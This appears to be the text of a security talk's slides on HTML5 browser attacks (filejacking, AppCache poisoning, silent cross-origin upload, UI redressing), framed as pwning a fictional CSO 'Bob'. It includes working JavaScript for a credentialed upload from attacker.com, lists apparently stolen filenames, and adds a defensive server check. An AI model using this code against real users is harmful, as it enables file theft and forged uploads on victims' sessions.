3. Meet Bob
#1 Bob is a CSO of largebiz.com
#1b Bob has interesting stuff
#2 I don’t like Bob
#3 I want to pwn Bob
4. Bob’s pwnage stage #1
• Bob has a hobby - e.g. hacking
• He has cool file://s
• I want to get them!
• He’s not THAT stupid to run EXE, SCR etc.
• Use filejacking!
5. Filejacking
• HTML5 directory upload (Chrome only): <input type=file directory>
• displays this ====>
• JS gets read access to all files within chosen folder
6. Filejacking
Business plan
• set up tempting webpage
• overlay input (CSS) with
• wait for Bob
• get files & upload them to your server
12. Filejacking
• Wireless Assess points.txt
• interesting network next to me.txt
• onlinePasswords.txt
• s/pw.txt
• letter of authorization.pdf
• Staff-<name,surname>.pdf
• <name,surname> - resume.doc
• Pricing-Recommendation_CR.xlsm.zip
• but surely no clients data?
13. Filejacking
• sony reports/0045_sonymusic.##.zip
• SecurityQA.SQL.Injection.Results.v1.1.docx
• SSOCrawlTest5.4.097.xml
• IPS CDE Wireless Audit-January 2011-1 0.docx
• IPS Wireless Testing Schedule April 2011.xls
• 01-####### Corporation (Security Unarmed Guard).xls
• Faktura_numer_26_2011_<company>.pdf
• websec cred~
• security_users.sql.zip
• !important - questions for web developers.docx
• sslstrip.log~
• ##### Paros Log.txt
So much for NDAs...
14. Filejacking
+ All your file are belong to me
+ Trivial to set up
+ Filter files by e.g. extension, size etc.
- Chrome only
- Requires users prone to social engineering
15. Bob’s pwnage stage #2
• Bob travels a lot & loves Facebook
• I want to control Bob’s FB account
• even when he changes the password in a month
• I want to fingerprint Bob’s intranet
• Use rogue access point & AppCache poisoning!
16. AppCache poisoning
HTML5 Offline Web Applications
<html manifest=cache.manifest>
• cache.manifest lists URLs to cache
• cache expires only when manifest is changed
cache.manifest:
CACHE MANIFEST
index.html
stylesheet.css
images/logo.png
scripts/main.js
20. AppCache poisoning
Later on, after the man-in-the-middle phase:
1. http://victim/ fetched from AppCache
2. browser checks for new manifest
GET /robots.txt
3. receives text/plain robots.txt & ignores it
4. tainted AppCache is still used
21. AppCache poisoning
+ Poison any URL
+ Payload stays until manually removed
- Chrome or Firefox with user interaction
- Needs active man-in-the-middle to inject
https://github.com/koto/sslstrip
22. Bob’s pwnage stage #3
• Bob loves sharing photos (Flickr?)
• I want to replace Bob as CSO
• What if Bob uploaded some discrediting files?
• Try silent file upload
23. Silent file upload
• File upload purely in Javascript
• Emulates <input type=file> with:
• any file name
• any file content
• File constructed in Javascript (it’s not a real file!)
• Uses Cross Origin Resource Sharing
24. Silent file upload
• Cross Origin Resource Sharing = cross domain AJAX
• script served from http://attacker.com/:
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://victim", true);
xhr.setRequestHeader("Content-Type", "text/plain");
xhr.withCredentials = true; // send cookies (boolean, not the string "true")
xhr.send("Anything I want");
25. Silent file upload
• raw multipart/form-data request
function fileUpload(url, fileData, fileName) {
  var boundary = "xxxxxxxxx",
      xhr = new XMLHttpRequest();
  xhr.open("POST", url, true);
  xhr.withCredentials = true; // send cookies (boolean, not the string "true")
  xhr.setRequestHeader("Content-Type",
    "multipart/form-data; boundary=" + boundary);
  // hand-built multipart body: one part that looks like a chosen file;
  // the field name "file" is a placeholder for whatever the endpoint expects
  var body = "--" + boundary + "\r\n" +
    'Content-Disposition: form-data; name="file"; filename="' + fileName + '"\r\n' +
    "Content-Type: application/octet-stream\r\n\r\n" +
    fileData + "\r\n--" + boundary + "--\r\n";
  xhr.send(body);
}
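As an added example (not from the slides or the talk's own code), a server-side check that refuses the cross-origin credentialed upload shown above; the request object shape (method, lower-case header names, sessionToken), the header names and the trusted origin are this example's assumptions:

```javascript
// Added example: server-side gate for multipart uploads. The request shape,
// the "x-csrf-token" header and the trusted origin are assumptions.
const TRUSTED_ORIGINS = new Set(["https://victim.example"]); // constructed value

// Returns the reason an upload request is refused, or null if it may proceed.
function rejectUploadReason(req) {
  if (req.method.toUpperCase() !== "POST") return "method";
  const ctype = (req.headers["content-type"] || "").toLowerCase();
  // multipart/form-data is a CORS "simple" type: the browser sends it cross-origin
  // without a preflight, so CORS response headers cannot stop the upload itself.
  if (!ctype.startsWith("multipart/form-data")) return "content-type";
  // Browsers add Origin to cross-origin XHR POSTs; an unknown origin is refused.
  const origin = req.headers["origin"];
  if (origin !== undefined && !TRUSTED_ORIGINS.has(origin)) return "origin";
  // Newer browsers also send Sec-Fetch-Site; "cross-site" is refused outright.
  if (req.headers["sec-fetch-site"] === "cross-site") return "sec-fetch-site";
  // Cookies alone (what withCredentials attaches) prove nothing about intent:
  // require a per-session token that a page on another origin cannot read.
  const token = req.headers["x-csrf-token"];
  if (!token || token !== req.sessionToken) return "csrf-token";
  return null;
}

// Constructed sample: the request the slide's script produces from attacker.com.
const silentUpload = {
  method: "POST",
  headers: {
    "content-type": "multipart/form-data, boundary=xxxxxxxxx",
    "origin": "http://attacker.com",
    "cookie": "session=abc123",
  },
  sessionToken: "t0k3n",
};

// Constructed sample: the same upload made by the site's own form.
const legitUpload = {
  method: "POST",
  headers: {
    "content-type": "multipart/form-data; boundary=----WebKitFormBoundary",
    "origin": "https://victim.example",
    "sec-fetch-site": "same-origin",
    "cookie": "session=abc123",
    "x-csrf-token": "t0k3n",
  },
  sessionToken: "t0k3n",
};
```

The Origin check is what distinguishes the two samples; the token check additionally covers requests that carry no Origin header at all.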
30. Same origin policy
• makes web (relatively) safe
• restricts cross-origin communication
• can be relaxed though
• crossdomain.xml
• document.domain
• HTML5 Cross Origin Resource Sharing
• or ignored...
• UI redressing
32. UI Redressing
• This is not the page you’re looking at
• This is not the thing you’re clicking
• This is not the thing you’re dragging
• This is not the thing you’re typing
• This is not the thing you’re copying
• Victims attack the applications for us
34. Bob’s pwnage stage #4
• Bob likes online games
• I found a vulnerable website used by Bob
• Bob would have to type the payload himself :-(
• Make Bob play a game!